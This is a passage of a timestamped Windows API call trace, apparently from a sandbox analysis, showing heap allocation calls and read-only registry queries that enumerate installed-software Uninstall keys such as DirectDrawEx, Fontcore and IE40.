(HeapHandle=0x2b0000, Flags=0x0, Size=0x9) returned 0x2f52e0 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x12) returned 0x2ceff0 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2dc4e8 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x4c) returned 0x2f8fe0 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2e6040 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x8e) returned 0x2e6040 [0221.393] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2cf110 [0221.393] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.393] GetProcessHeap () returned 0x2b0000 [0221.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf110 | out: hHeap=0x2b0000) returned 1 [0221.394] RegCloseKey (hKey=0x314) returned 0x0 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2dc4e8 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x4c) returned 0x2f8fe0 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2e6040 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x8e) returned 0x2e6040 [0221.394] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2cf110 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf110, Size=0x28) returned 0x2dc4e8 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.394] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.394] GetProcessHeap () returned 0x2b0000 [0221.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.394] RegCloseKey (hKey=0x314) returned 0x0 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.395] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2ecf68 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.395] GetProcessHeap () returned 0x2b0000 [0221.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c6680 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x82) returned 0x2e6040 [0221.396] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.396] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52b0 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52b0, Size=0x20) returned 0x2ecf68 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.397] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.397] RegCloseKey (hKey=0x314) returned 0x0 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c6680 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x82) returned 0x2e6040 [0221.397] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52b0 [0221.397] GetProcessHeap () returned 0x2b0000 [0221.397] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52b0, Size=0x14) returned 0x2ceff0 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.398] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.398] RegCloseKey (hKey=0x314) returned 0x0 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.398] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ceff0 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.398] GetProcessHeap () returned 0x2b0000 [0221.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.399] GetProcessHeap () returned 0x2b0000 [0221.399] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x7a) returned 0x2fa288 [0221.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa288 | out: hHeap=0x2b0000) returned 1 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.400] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.400] RegCloseKey (hKey=0x314) returned 0x0 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa288 [0221.400] GetProcessHeap () returned 0x2b0000 [0221.400] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa288, Size=0x7a) returned 0x2fa200 [0221.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa200 | out: hHeap=0x2b0000) returned 1 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.401] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.401] RegCloseKey (hKey=0x314) returned 0x0 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2b0000) returned 1 [0221.401] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.401] GetProcessHeap () returned 0x2b0000 [0221.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ecf68 [0221.402] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x3c) returned 0x2c79e0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x78) returned 0x2c0ba0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c0ba0, Size=0x72) returned 0x2c0c20 [0221.403] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0c20 | out: hHeap=0x2b0000) returned 1 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.403] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.403] RegCloseKey (hKey=0x314) returned 0x0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ecf68 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x3c) returned 0x2c79e0 [0221.403] GetProcessHeap () returned 0x2b0000 [0221.403] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x78) returned 0x2c0c20 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c0c20, Size=0x72) returned 0x2c0ba0 [0221.404] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0ba0 | out: hHeap=0x2b0000) returned 1 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.404] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.404] RegCloseKey (hKey=0x314) returned 0x0 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.404] GetProcessHeap () returned 0x2b0000 [0221.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2b0000) returned 1 [0221.404] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f52e0 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.405] GetProcessHeap () returned 0x2b0000 [0221.405] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x78) returned 0x2c0ba0 [0221.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0ba0 | out: hHeap=0x2b0000) returned 1 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 